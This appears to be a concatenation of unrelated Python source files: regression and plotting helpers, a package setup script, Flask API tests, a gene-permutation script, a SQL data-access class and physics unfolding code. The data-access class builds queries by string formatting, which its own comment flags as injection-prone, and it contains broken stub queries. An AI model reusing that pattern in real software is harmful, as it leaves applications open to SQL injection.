    df['residuals'] = df['pred'] - df['truth']
    plt.figure(figsize = [8.0, 6.0])
    plt.hist(df.residuals, bins=30, density=True)
    plt.title("Residuals histogram")
    # Overlay the Gaussian with the residuals' own mean/variance for a visual normality check.
    mean = np.mean(df.residuals)
    variance = np.var(df.residuals)
    sigma = np.sqrt(variance)
    x = np.linspace(min(df.residuals), max(df.residuals), 100)
    plt.plot(x, stats.norm.pdf(x, mean, sigma), label='Gaussian', linewidth=3)
    plt.legend()
def plot_diagnostics_lr(df, data_fe):
    """
    plots multi-panel diagnostics of linear regression assumptions
    arguments
    ---------
    df: dataframe containing residuals columns
    data_fe: prepared features the residuals are plotted against
    return
    ------
    none
    """
    # Panel (0,0): residual histogram with a fitted Gaussian overlay;
    # remaining panels: residuals vs. individual features (should show no structure).
    fig3, ax3 = plt.subplots(3, 3, figsize=(20, 15))
    ax3[0, 0].hist(df.residuals, bins=30, density=True)
    ax3[0, 0].set_title("Residuals histogram")
    mean = np.mean(df.residuals)
    variance = np.var(df.residuals)
    sigma = np.sqrt(variance)
    x = np.linspace(min(df.residuals), max(df.residuals), 100)
    ax3[0, 0].plot(x, stats.norm.pdf(x, mean, sigma), label='Gaussian', linewidth=3)
    ax3[0, 0].legend()
    ax3[0, 1].scatter(data_fe["yr_2012"], df.residuals, s = 2)
    ax3[0, 1].set_title("year_2012 yes/no")
    ax3[0, 2].scatter(data_fe["humidity"], df.residuals, s = 2)
    ax3[0, 2].set_title("humidity")
    ax3[1, 0].scatter(data_fe["windspeed"], df.residuals, s = 2)
    ax3[1, 0].set_title("windspeed")
    ax3[1, 1].scatter(data_fe["atemp"], df.residuals, s = 2)
    ax3[1, 1].set_title("atemp")
    ax3[1, 2].scatter(data_fe["weather"], df.residuals, s = 2)
    ax3[1, 2].set_title("weather")
    ax3[2, 0].scatter(data_fe["hr_8_workingday"], df.residuals, s = 2)
    ax3[2, 0].set_title("hr_8_workingday")
    ax3[2, 1].scatter(data_fe["windspeed_Sq"], df.residuals, s = 2)
    ax3[2, 1].set_title("windspeed_Sq")
    ax3[2, 2].scatter(data_fe["humidity_Sq"], df.residuals, s = 2)
    ax3[2, 2].set_title("humidity_Sq")
def save_figure(fig, filename):
    """
    saves figure to filename path
    arguments
    ---------
    fig: figure
    filename: string containing path to file
    return
    ------
    none
    """
    # Thin wrapper kept so all figure saving goes through one module-level API.
    fig.savefig(filename)
def feature_engineer(data, scaler_weatherFeatures, scaler_allFeatures, kind = "train"):
    """
    prepares and scales features for linear regression including
    - interaction terms,
    - second-order features of weather data,
    - weather variables: humidity, windspeed, atemp, weather,
    - one-hot-encoded hours, months, years
    arguments
    ---------
    data: raw training data with a DatetimeIndex
    scaler_weatherFeatures: a scaler initialized using sklearn's StandardScaler() which scales the weather features prior to calculating their second-order terms
    scaler_allFeatures: a scaler initialized using sklearn's StandardScaler() which scales all features after engineering
    kind: a string containing either "train" or "test" to indicate the type of dataset passed to the function
    return
    ------
    tuple of (dataframe of engineered features, fitted weather scaler, fitted all-features scaler)
    """
    # FIX: .copy() — the old column-slice view triggered SettingWithCopy warnings
    # (and potentially lost writes) when new columns were added below.
    df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']].copy()
    df['yr'] = data.index.year
    df['mon'] = data.index.month
    df['hr'] = data.index.hour
    variables_to_be_encoded = df[['yr', 'mon', 'hr']]
    df_notEncoded = df.drop(columns=['yr', 'mon', 'hr'])
    df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
    df_unscaled = pd.concat([df_encoded, df_notEncoded], axis=1)
    # Fit the weather scaler only on training data; reuse it unchanged on test data.
    if kind == "train":
        scaled_weatherFeatures = scaler_weatherFeatures.fit_transform(df_unscaled[['windspeed', 'humidity', 'atemp']])
    elif kind == "test":
        scaled_weatherFeatures = scaler_weatherFeatures.transform(df_unscaled[['windspeed', 'humidity', 'atemp']])
    df_weather_scaled = pd.DataFrame(scaled_weatherFeatures, columns=['windspeed', 'humidity', 'atemp'], index=df_unscaled.index)
    df_unscaledFeatures = df_unscaled.drop(columns=['windspeed', 'humidity', 'atemp'])
    df_features = df_weather_scaled.merge(df_unscaledFeatures, left_index=True, right_index=True)
    # Vectorized column products replace the previous row-wise .apply calls
    # (identical values, O(n) instead of a Python call per row). Column order
    # is preserved so downstream column selections are unaffected.
    for hour in ('hr_8', 'hr_18', 'hr_13', 'hr_15', 'hr_21', 'hr_1', 'hr_14', 'hr_16'):
        df_features[f'{hour}_workingday'] = df_features[hour] * df_features['workingday']
    for col in ('windspeed', 'humidity', 'atemp'):
        df_features[f'{col}_Sq'] = df_features[col] ** 2
    df_features.drop(columns = "workingday", inplace = True)
    if kind == "train":
        scaled_features = scaler_allFeatures.fit_transform(df_features)
    elif kind == "test":
        scaled_features = scaler_allFeatures.transform(df_features)
    df_features_scaled = pd.DataFrame(scaled_features, columns=df_features.columns, index=df_features.index)
    return df_features_scaled, scaler_weatherFeatures, scaler_allFeatures
def feature_engineer_rbf(data):
    """
    prepares features for linear regression including
    - interaction terms of rbfs and non-workingdays,
    - weather variables: humidity, windspeed, atemp, weather,
    - one-hot-encoded hours, months, years
    arguments
    ---------
    data: raw training data with a DatetimeIndex and precomputed rbf_* columns
    return
    ------
    dataframe of engineered features
    """
    # FIX: .copy() avoids SettingWithCopy warnings when adding columns to a slice.
    df = data[
        ['humidity', 'windspeed', 'atemp', 'weather', 'workingday', 'rbf_22', 'rbf_8', 'rbf_3', 'rbf_11', 'rbf_15']].copy()
    df['yr'] = data.index.year
    df['mon'] = data.index.month
    df['hr'] = data.index.hour
    variables_to_be_encoded = df[['yr', 'mon', 'hr']]
    df_notEncoded = df.drop(columns=['yr', 'mon', 'hr'])
    df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
    df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
    # Vectorized: keep each rbf bump only on non-working days (rbf * not-workingday),
    # replacing the previous row-wise .apply calls with identical values.
    not_working = ~df_features['workingday'].astype(bool)
    for rbf_col, out_col in (('rbf_22', 'hr_8_weekendHol_rbf'),
                             ('rbf_8', 'hr_18_weekendHol_rbf'),
                             ('rbf_3', 'hr_13_weekendHol_rbf'),
                             ('rbf_11', 'hr_21_weekendHol_rbf'),
                             ('rbf_15', 'hr_1_weekendHol_rbf')):
        df_features[out_col] = df_features[rbf_col] * not_working
    df_features.drop(columns=['rbf_22', 'rbf_8', 'rbf_3', 'rbf_11', 'rbf_15', 'workingday'], inplace = True)
    return df_features
def feature_engineer_interaction_terms(data):
    """
    prepares features for linear regression including
    - interaction terms,
    - weather variables: humidity, windspeed, atemp, weather,
    - one-hot-encoded hours, months, years
    arguments
    ---------
    data: raw training data with a DatetimeIndex
    return
    ------
    dataframe of engineered features
    """
    # FIX: .copy() avoids SettingWithCopy warnings when adding columns to a slice.
    df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']].copy()
    df['yr'] = data.index.year
    df['mon'] = data.index.month
    df['hr'] = data.index.hour
    variables_to_be_encoded = df[['yr', 'mon', 'hr']]
    df_notEncoded = df.drop(columns=['yr', 'mon', 'hr'])
    df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
    df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
    # Vectorized products (same values as the old row-wise .apply, O(n) instead);
    # order preserved so the resulting column layout is unchanged.
    for hour in ('hr_8', 'hr_18', 'hr_13', 'hr_21', 'hr_1'):
        df_features[f'{hour}_workingday'] = df_features[hour] * df_features['workingday']
    df_features.drop(columns = "workingday", inplace = True)
    return df_features
def feature_engineer_single_interaction_term(data):
    """
    prepares features for linear regression including
    - single interaction term between 8th hour and workingday booleans,
    - weather variables: humidity, windspeed, atemp, weather,
    - one-hot-encoded hours, months, years
    arguments
    ---------
    data: raw training data with a DatetimeIndex
    return
    ------
    dataframe of engineered features
    """
    # FIX: .copy() avoids SettingWithCopy warnings when adding columns to a slice.
    df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']].copy()
    df['yr'] = data.index.year
    df['mon'] = data.index.month
    df['hr'] = data.index.hour
    variables_to_be_encoded = df[['yr', 'mon', 'hr']]
    df_notEncoded = df.drop(columns=['yr', 'mon', 'hr'])
    df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
    df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
    # Vectorized product — identical values to the old row-wise .apply, O(n).
    df_features['hr_8_workingday'] = df_features['hr_8'] * df_features['workingday']
    df_features.drop(columns=['workingday'], inplace = True)
    return df_features
def feature_engineer_baseline(data):
    """
    prepares features for linear regression including
    - weather variables: humidity, windspeed, atemp, weather,
    - one-hot-encoded hours, day of the week, months, years
    arguments
    ---------
    data: raw training data with a DatetimeIndex
    return
    ------
    dataframe of engineered features
    """
    # FIX: .copy() avoids SettingWithCopy warnings when adding columns to a slice.
    df = data[['humidity', 'windspeed', 'atemp', 'weather']].copy()
    df['yr'] = data.index.year
    df['mon'] = data.index.month
    df['dayOfWeek'] = data.index.dayofweek
    df['hr'] = data.index.hour
    variables_to_be_encoded = df[['yr', 'mon', 'dayOfWeek', 'hr']]
    df_notEncoded = df.drop(columns=['yr', "mon", "dayOfWeek", 'hr'])
    df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['dayOfWeek', 'yr', 'mon', 'hr'], drop_first=True)
    df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
    return df_features
def rbf(x, width, mean):
    """
    evaluates an (unnormalized) Gaussian radial basis function at x
    arguments
    ---------
    x: scalar or numpy array of positions
    width: variance of the Gaussian bump
    mean: center of the Gaussian bump
    return
    ------
    scalar or numpy array
    """
    deviation = x - mean
    return np.exp(-deviation ** 2 / (2 * width))
def rbf_transform(df, freq, width):
    """
    adds radial-basis-function encoded columns (one per phase of the cycle) to df
    arguments
    ---------
    df: dataframe of features to be rbf-encoded
    freq: cycle length (number of rbf columns to create)
    width: chosen width (variance) of the Gaussian bumps
    return
    ------
    dataframe (same object, with rbf_0 .. rbf_{freq-1} columns added)
    """
    positions = np.arange(df.shape[0])
    limit = df.shape[0]
    for phase in range(freq):
        # Sum Gaussian bumps centred at phase + offset for every whole period,
        # starting one period before the data so the first rows are covered too.
        total = np.zeros(limit)
        for offset in range(-freq, limit + 1, freq):
            total = total + rbf(positions, width, phase + offset)
        df[f'rbf_{phase}'] = total
    return df
def print_model_scores(model, X_train, X_test, y_train, y_test):
    """
    prints the model's R-squared on the training and test sets
    arguments
    ---------
    model: fitted machine learning model exposing .score()
    X_train: feature engineered training data
    X_test: feature engineered test data
    y_train: target y-variable of the training data set
    y_test: target y-variable of the test data set
    return
    ------
    none
    """
    train_rsq = model.score(X_train, y_train)
    test_rsq = model.score(X_test, y_test)
    print(f'Training Score rSq: {train_rsq}')
    print(f'Testing Score rSq: {test_rsq}')
def print_logmodel_scores(model, X_train, X_test, y_train, y_test):
    """
    prints multiple scores of a model trained against the logarithm of the target variable
    arguments
    ---------
    model: machine learning model fitted on log(y)
    X_train: feature engineered training data
    X_test: feature engineered test data
    y_train: target y-variable of the training data set
    y_test: target y-variable of the test data set
    return
    ------
    none
    """
    # Predictions are on the log scale; exponentiate once before scoring on the original scale.
    y_pred_train = np.exp(model.predict(X_train))
    y_pred_test = np.exp(model.predict(X_test))
    rSq_train = r2_score(y_train, y_pred_train)
    rSq_test = r2_score(y_test, y_pred_test)
    rmSqE_train = np.sqrt(mean_squared_error(y_train, y_pred_train))
    rmSqE_test = np.sqrt(mean_squared_error(y_test, y_pred_test))
    mSqLE_train = mean_squared_log_error(y_train, y_pred_train)
    mSqLE_test = mean_squared_log_error(y_test, y_pred_test)
    # FIX: the previous version also computed sqrt(mSqLE) for train/test but never
    # reported either value — dead computation removed; printed output is unchanged.
    result_dict = {'Train rSq': rSq_train, 'Test rSq': rSq_test, 'Train rmSqE': rmSqE_train, 'Test rmSqE': rmSqE_test, 'Train mSqLE': mSqLE_train, 'Test mSqLE': mSqLE_test}
    result = pd.DataFrame(result_dict, index=[0])
    print(result)
def print_cross_val_results(model, X_train, y_train):
    """
    prints multiple cross-validation scores of a model
    arguments
    ---------
    model: machine learning model
    X_train: feature engineered training data
    y_train: target y-variable of the training data set
    return
    ------
    none
    """
    # FIX: the previous version built an unused RMSE scorer and labelled plain
    # mean-squared-error results as 'mSqLE'/'rmSqLE' (mean squared LOG error),
    # which misreported what was computed. Labels now match the metric.
    mse = make_scorer(mean_squared_error)
    rSq = cross_val_score(model, X_train, y_train, cv=5)
    mSqE = cross_val_score(model, X_train, y_train, cv=5, scoring=mse)
    rmSqE = np.sqrt(mSqE)
    result_dict = {'rSq': rSq, 'mean rSq': rSq.mean(), 'std rSq': rSq.std(), 'mSqE': mSqE, 'rmSqE': rmSqE}
    result = pd.DataFrame(result_dict)
    print(result)
def bootstrapping(model, X_train, y_train):
    """
    prints bootstrapped confidence intervals of the root mean squared log error
    *** function under construction: currently predicts on the training (bootstrap)
    sample, but should predict on the out-of-sample test data
    arguments
    ---------
    model: machine learning model
    X_train: feature engineered training data
    y_train: target y-variable of the training data set
    return
    ------
    none
    """
    scores = []
    for _ in range(1000):
        sample_X, sample_y = resample(X_train, y_train)
        model.fit(sample_X, np.log(sample_y))
        sample_pred = model.predict(sample_X)
        scores.append(np.sqrt(mean_squared_log_error(sample_y, np.exp(sample_pred))))
    scores.sort()
    # Trim an equal number of scores from each tail to form the interval.
    for level, trim in ((80, 100), (90, 50), (95, 25), (99, 5)):
        band = scores[trim:-trim]
        print(f"{level}% confidence interval: {band[0]:5.2} -{band[-1]:5.2}")
def submit(model, train_data, test_data, y, file_name="submission_default.csv"):
    """
    creates kaggle submission file from entire pipeline:
    - feature engineering of test and training data
    - fits model to logarithm of target y-variable and training data
    - makes predictions of the test data set with trained model
    - generates csv file from predictions
    arguments
    ---------
    model: unfitted machine learning model
    train_data: raw training data
    test_data: raw test data
    y: target y-variable of the training data set
    file_name: string containing path to file
    return
    ------
    none
    """
    # FIX: feature_engineer requires two scalers and returns a 3-tuple; the old
    # single-argument call would raise a TypeError before anything was fitted.
    # (Assumes feature_engineer is the intended pipeline here — confirm it was
    # not meant to be one of the other feature_engineer_* variants.)
    scaler_weather = StandardScaler()
    scaler_all = StandardScaler()
    data_fe, scaler_weather, scaler_all = feature_engineer(train_data, scaler_weather, scaler_all, kind="train")
    model.fit(data_fe, np.log(y))
    # Reuse the scalers fitted on the training data for the test features.
    data_test_fe, _, _ = feature_engineer(test_data, scaler_weather, scaler_all, kind="test")
    # Model predicts log-counts; exponentiate back for the submission.
    y_pred = model.predict(data_test_fe)
    y_pred_s = pd.Series(np.exp(y_pred))
    datetime = pd.Series(test_data.index)
    submission_data = pd.concat([datetime, y_pred_s], axis=1)
    submission_data.columns = ['datetime', 'count']
    submission_data.to_csv(file_name, index=False)
    print(f"Successfully generated prediction: {file_name}.")
|
import setuptools
# The long description shown on PyPI comes straight from the README (reStructuredText).
with open("README.rst", "r") as readMe:
    long_description = readMe.read()
# Package metadata; note there is no install_requires — the package declares no dependencies.
setuptools.setup(
    name="billionfong",
    version="1.2.6",
    author="Billy Fong",
    author_email="billionfong@billionfong.com",
    description="Welcome to billionfong's playground",
    long_description=long_description,
    long_description_content_type="text/x-rst",
    url="https://www.billionfong.com/",
    download_url="https://github.com/billionfong/Python_Package",
    packages=setuptools.find_packages(),
)
|
import pytest
import sys
import random
import string
import json
from app import create_app
def random_string_generator():
    """Return a 12-character random string of ASCII letters and punctuation."""
    alphabet = string.ascii_letters + string.punctuation
    return ''.join(random.choice(alphabet) for _ in range(12))
# Module-wide random credentials: every test in this file registers/logs in with this user.
username = random_string_generator()
password = random_string_generator()
print("Testing with ", username, "as Admin")
@pytest.fixture
def client():
    """Yield a Flask test client built from the app's test configuration."""
    app = create_app("test_config")
    app.config['TESTING'] = True
    with app.test_client() as client:
        yield client
def test_register_and_login_admin(client):
    """Make sure register and login works."""
    # Register, then check the response echoes the credentials and admin role we sent.
    res = register_as_admin(client)
    res_json = json.loads(res.decode("utf-8"))
    assert len(res_json) == 1
    reg_user_id = res_json[0].get("id")
    reg_user_name = res_json[0].get("user_name")
    reg_user_role = res_json[0].get("user_role")
    assert reg_user_name == username
    assert reg_user_role == "admin"
    # Logging in with the same credentials must return the identical user record.
    res = login(client)
    res_json = json.loads(res.decode("utf-8"))
    assert len(res_json) == 1
    login_user_id = res_json[0].get("id")
    login_user_name = res_json[0].get("user_name")
    login_user_role = res_json[0].get("user_role")
    assert (login_user_id == reg_user_id and \
        login_user_name == reg_user_name and login_user_role == reg_user_role)
def test_read_admin(client):
    """Make sure crud/read works."""
    # Listing endpoint: every movie record must carry the expected typed fields.
    res = read(client)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    for each in res_json:
        assert isinstance(each.get("id"), (int, float))
        assert isinstance(each.get("name"), str)
        assert isinstance(each.get("99popularity"), float)
        assert isinstance(each.get("director"), str)
        assert isinstance(each.get("genre"), str)
        assert isinstance(each.get("imdb_score"), float)
    # Fetching the first movie by id must return exactly that single record.
    test_movie = res_json[0]
    movie_id = test_movie.get("id")
    res = read_with_id(client, movie_id)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    assert len(res_json) == 1
    assert res_json[0] == test_movie
def test_create_update_delete_admin(client):
    """Make sure crud/create, crud/update and crud/delete work."""
    # Create a movie and validate the echoed record's field types.
    res = create(client)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    assert len(res_json) == 1
    assert isinstance(res_json[0].get("id"), (int, float))
    assert isinstance(res_json[0].get("name"), str)
    assert isinstance(res_json[0].get("99popularity"), float)
    assert isinstance(res_json[0].get("director"), str)
    assert isinstance(res_json[0].get("genre"), str)
    assert isinstance(res_json[0].get("imdb_score"), float)
    movie_id = res_json[0].get("id")
    # Update the movie and compare against the expected serialized form.
    res = update(client, movie_id)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    assert len(res_json) == 1
    updated_json = {
        "id" : movie_id,
        "name" : "movie",
        "director" : "director",
        "99popularity": 50.0,
        "genre": ["Action"],
        "imdb_score": 5.0
    }
    # The API stores genre as a sorted comma-joined string, so normalize before comparing.
    updated_json["genre"] = ",".join(sorted([i.strip() for i in updated_json.get("genre")]))
    assert res_json[0] == updated_json
    # Delete must return the record that was removed.
    res = delete(client, movie_id)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    assert len(res_json) == 1
    assert res_json[0] == updated_json
def test_search_admin(client):
    """Make sure search/movies works: every hit matches both filters."""
    res = create(client)
    res_json = json.loads(res.decode("utf-8"))
    created_movie = res_json[0]
    movie_id = created_movie.get("id")
    res = search(client)
    res_json = json.loads(res.decode("utf-8"))
    assert isinstance(res_json, list)
    # Normalise genre the way the API stores it (sorted, comma-joined).
    created_movie["genre"] = ",".join(sorted([i.strip() for i in created_movie.get("genre")]))
    for each in res_json:
        assert "movie" in each.get("name").lower()
        assert "director" in each.get("director").lower()
    # Clean up the record created for this test.
    res = delete(client, movie_id)
def test_logout_admin(client):
    """Make sure user/logout works and reports success."""
    res = logout(client)
    assert b"{\"status\": \"success\", \"msg\": \"Logged Out\"}" in res
def logout(client):
    """Authenticate first, then hit user/logout; return the raw response body."""
    login(client)
    response = client.delete('user/logout')
    return response.data
def search(client):
    """Authenticate, then query search/movies with fixed name/director filters."""
    login(client)
    response = client.get('search/movies?name=movie&director=director')
    return response.data
def delete(client, movie_id):
    """Authenticate, then DELETE the movie by id; return the raw response body."""
    login(client)
    response = client.delete('crud/delete/' + str(movie_id))
    return response.data
def update(client, movie_id):
    """Authenticate, then PATCH the movie with fixed test fields; return raw body."""
    payload = {
        "name" : "movie",
        "director" : "director",
        "99popularity": 50.0,
        "genre": ["Action"],
        "imdb_score": 5.0
    }
    login(client)
    response = client.patch('crud/update/' + str(movie_id), json=payload)
    return response.data
def create(client):
    """Authenticate, then POST a fixed test movie; return the raw response body."""
    payload = {
        "name" : "movie",
        "director" : "director",
        "99popularity": 50.0,
        "genre": ["Action"],
        "imdb_score": 5.0
    }
    login(client)
    response = client.post('crud/create', json=payload)
    return response.data
def read(client):
    """Authenticate, then GET the full movie list; return the raw response body."""
    login(client)
    response = client.get("crud/read")
    return response.data
def read_with_id(client, movie_id):
    """Authenticate, then GET a single movie by id; return the raw response body."""
    login(client)
    response = client.get("crud/read/" + str(movie_id))
    return response.data
def register_as_admin(client):
    """Register the module-level test user with the admin role; return raw body."""
    payload = {
        "user_name" : username,
        "password" : password,
        "user_role" : "admin"
    }
    response = client.post('user/register', json=payload)
    return response.data
def login(client):
    """Log the module-level test user in; return the raw response body."""
    credentials = {
        "user_name" : username,
        "password" : password
    }
    response = client.post('user/login', json=credentials)
    return response.data
"""
(C) Casey Greene.
This python script generates a number of different files that serve as permuted
standards for NetWAS analysis from a GWAS. These files differ only in their
gene ordering to evaluate the effects of multiple cross validation intervals
on the results.
"""
import os
import pandas as pd
import numpy as np
np.random.seed(42)

# header on the first line, gene name in the second col
vegas_ad1 = pd.read_excel('data/vegas_adni1.xls', header=0)
vegas_ad2 = pd.read_excel('data/vegas_adni2.xls', header=0)
entrez_symbol = pd.read_csv('data/symbol_entrez.txt', sep='\t', header=None,
                            index_col=1)
symbol_entrez = pd.read_csv('data/symbol_entrez.txt', sep='\t', header=None,
                            index_col=0)
# Symbol -> Entrez id lookup; rows with no mapping are dropped below.
d_se = symbol_entrez.to_dict(orient='dict')[1]
vegas_ad1['Entrez'] = vegas_ad1['Gene'].map(d_se)
vegas_ad2['Entrez'] = vegas_ad2['Gene'].map(d_se)
vegas_ad1 = vegas_ad1.dropna(how='any')
vegas_ad2 = vegas_ad2.dropna(how='any')
# Binary NetWAS standard: positive (1) iff the VEGAS p-value clears 0.01.
vegas_ad1['nw_std'] = vegas_ad1['Pvalue'].map(lambda x: 1 if x < 0.01 else 0)
vegas_ad2['nw_std'] = vegas_ad2['Pvalue'].map(lambda x: 1 if x < 0.01 else 0)
if not os.path.exists('standards'):
    os.mkdir('standards')
if not os.path.exists('standards/p_vegas_ad1'):
    os.mkdir('standards/p_vegas_ad1')
if not os.path.exists('standards/p_vegas_ad2'):
    os.mkdir('standards/p_vegas_ad2')


def _write_permutations(df, out_prefix, count=1000):
    """Write *count* permuted two-column (Entrez, nw_std) standards files.

    NOTE(review): df.apply(np.random.permutation) shuffles each column
    independently, which scrambles the Entrez<->nw_std pairing rather than
    only reordering rows -- confirm this is the intended null model.
    """
    for i in range(count):  # range() replaces the Python-2-only xrange()
        vg_perm = df.apply(np.random.permutation)
        vg_perm['Entrez'] = vg_perm['Entrez'].astype(int)
        vg_perm.to_csv(out_prefix + str(i), sep="\t",
                       columns=['Entrez', 'nw_std'], header=False, index=False)


# Same call order as the original loops, so the global RNG stream is unchanged.
_write_permutations(vegas_ad1, 'standards/p_vegas_ad1/')
_write_permutations(vegas_ad2, 'standards/p_vegas_ad2/')
|
# -*- coding: utf-8 -*-
# Description:
# Created: liujiaye 2020/08/11
from app.utils.base_dao import BaseDao
class StockDao(BaseDao):
    """Data-access object for daily shippable-stock queries (via BaseDao).

    NOTE(review): query parameters are interpolated with str.format, not
    bound placeholders -- safe only for trusted, internally generated
    date strings; confirm callers never pass user input.
    """
    def select_stock_day_detail(self, day):
        """Return all rows of can_be_send_amount_daily recorded on *day*."""
        sql = """SELECT
        id,
        ORITEMNUM order_number,
        NOTICENUM shipping,
        WAINTFORDELNUMBER w_count,
        WAINTFORDELWEIGHT w_weight,
        CANSENDNUMBER c_count,
        CANSENDWEIGHT c_weight,
        SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
        DETAILADDRESS unloading_address,
        record_day time_period,
        CITY city,
        end_point district,
        ALTERTIME can_send_date,
        COMMODITYNAME prod_name,
        CONTACTNAME receiving_user
        FROM
        can_be_send_amount_daily
        WHERE
        record_day='{0}'"""
        data = self.select_all(sql.format(day))
        # print(sql.format(day))
        return data
    def select_stock_log(self, date1, date2):
        """Return log rows with ALTERTIME between *date1* and *date2* inclusive."""
        sql = """SELECT
        id,
        ORITEMNUM order_number,
        NOTICENUM shipping,
        WAINTFORDELNUMBER w_count,
        WAINTFORDELWEIGHT w_weight,
        CANSENDNUMBER c_count,
        CANSENDWEIGHT c_weight,
        SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
        DETAILADDRESS unloading_address,
        ALTERTIME can_send_date,
        CITY city,
        ADDRESS district,
        COMMODITYNAME prod_name,
        STATUS status
        FROM
        can_be_send_amount_log_small
        WHERE
        ALTERTIME>={0} and ALTERTIME<={1}"""
        data = self.select_all(sql.format(date1, date2))
        return data
    def execute_add_stock(self, cargo_list):
        # TODO: add the INSERT statement here (was: "add the write-to-DB sql").
        # NOTE(review): sql is currently empty, so executemany() receives an
        # empty string -- this method is an unfinished stub.
        sql = ""
        for i in cargo_list:
            sql += ""
        self.executemany(sql)
    def select_out_stock_data(self, begin_time,end_time):
        """
        Read historical loading-list data between *begin_time* and *end_time*.
        :param begin_time: inclusive lower bound on CALCULATETIME
        :param end_time: inclusive upper bound on CALCULATETIME
        :return: list of rows from select_all()
        """
        # TODO: finish this sql (was: "modify sql").
        # NOTE(review): the FROM clause below has no table name -- this query
        # cannot run as written; fill in the source table before use.
        sql = """SELECT
        id,
        ORITEMNUM order_number,
        NOTICENUM shipping,
        WAINTFORDELNUMBER w_count,
        WAINTFORDELWEIGHT w_weight,
        CANSENDNUMBER c_count,
        CANSENDWEIGHT c_weight,
        SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
        DETAILADDRESS unloading_address,
        CALCULATETIME time_period,
        CITY city,
        end_point district
        FROM
        WHERE
        CALCULATETIME>={0} and CALCULATETIME<={1}"""
        data = self.select_all(sql.format(begin_time,end_time))
        return data
# Shared module-level instance used by callers of this DAO.
stock_dao = StockDao()
|
#! usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from numpy import linalg
def calc_granularity(hist2d_output):
    '''Calulates the granularity of a plt.hist2d object.
    The granularity approaches 0 when the histogram approaches a single bin, and 1 when the
    geometric area of the diagonal is negligble with respect to the range of the histogram.
    Assumes the hist2d is square.
    '''
    edges = hist2d_output[1]
    span = max(edges) - min(edges)
    total_area = span ** 2
    # Sum of squared bin widths = geometric area covered by the diagonal bins.
    diag_area = sum((hi - lo) ** 2 for lo, hi in zip(edges[:-1], edges[1:]))
    return 1 - diag_area / total_area
def calc_diagonality(hist2d_output):
    '''Calulates the diagonality of a plt.hist2d object.
    The diagonality approaches 0 when the diagonal elements contain none of the total histogram
    content, and 1 when diagonal elements contain the total histogram content.
    Assumes the hist2d is square.
    '''
    counts = hist2d_output[0]
    # Fraction of all histogram content sitting on the main diagonal.
    return np.trace(counts) / counts.sum()
def calc_response_matrix(df, bins, lims):
    '''Build a row-normalized reco-vs-gen response matrix.

    df maps 'reco' and 'gen' to equal-length sequences; bins/lims are passed
    straight to np.histogram2d.  Returns (matrix, xedges, yedges); each
    non-empty row of the matrix sums to 1.
    '''
    counts, xedges, yedges = np.histogram2d(df['reco'], df['gen'], bins,
                                            range=(lims, lims))
    for idx, row_total in enumerate(counts.sum(axis=1)):
        if row_total > 0:
            counts[idx, :] /= float(row_total)
    return counts, xedges, yedges
def plot_events_and_response(df, bins, rem, lims):
    '''Draw the gen-vs-reco event histogram next to its response matrix.

    df: mapping with 'reco' and 'gen' sequences; bins: bin count (int) or
    explicit edges (sequence, labelled "Bayesian"); rem: (matrix, xedges,
    yedges) as returned by calc_response_matrix; lims: (lo, hi) axis range.
    '''
    fig, ax = plt.subplots(1, 2)
    fig.suptitle(str(bins)+' bins' if type(bins) == int else 'Bayesian ('+str(len(bins)-1)+')')
    ax[0].hist2d(df['reco'], df['gen'], bins, range=[lims, lims])
    ax[0].set_title('Gen v Reco')
    ax[0].set_xlabel('reco')
    ax[0].set_ylabel('gen')
    fig.colorbar(ax[0].images[-1], ax=ax[0])
    # Transpose so reco runs along x and gen along y, matching the left panel.
    pc = ax[1].pcolor(rem[1], rem[2], rem[0].T)
    ax[1].axis([rem[1].min(), rem[1].max(), rem[2].min(), rem[2].max()])
    plt.colorbar(pc, ax=ax[1])
    ax[1].set_title('Response Matrix')
    ax[1].set_xlabel('reco')
    ax[1].set_ylabel('gen')
def plot_inv_rem(rem_tuple):
    '''Plot the Moore-Penrose pseudo-inverse of a response matrix.

    rem_tuple: (matrix, xedges, yedges).  Returns the pseudo-inverse array.
    '''
    pinv = linalg.pinv(rem_tuple[0])
    plt.pcolor(rem_tuple[1], rem_tuple[2], pinv.T)
    plt.axis([rem_tuple[1].min(), rem_tuple[1].max(), rem_tuple[2].min(), rem_tuple[2].max()])
    plt.colorbar()
    plt.title('Response Matrix Pseudo-Inverse')
    plt.xlabel('reco')
    plt.ylabel('gen')
    return pinv
def unfold_and_plot(rem, bc, bin_edges):
    '''Unfold reco-level counts *bc* through response matrix *rem* and plot.

    Unfolds with the pseudo-inverse and propagates Poisson uncertainties
    (variance = counts) through it; error bars are the square roots of the
    resulting covariance diagonal.
    '''
    inv_rem = linalg.pinv(rem)
    bc_shift = np.dot(inv_rem, bc)
    # cov[i, j] = sum_k inv[i, k] * inv[j, k] * bc[k]  (Poisson variances on bc)
    cov = np.zeros(inv_rem.shape)
    for i in range(inv_rem.shape[0]):
        for j in range(inv_rem.shape[1]):
            for k in range(len(bc)):
                cov[i, j] += inv_rem[i, k]*inv_rem[j, k]*bc[k]
    print(np.diag(cov))  # parenthesized: was a Python-2-only print statement
    bin_left = bin_edges[:-1]
    bin_width = bin_edges[1:]-bin_edges[:-1]
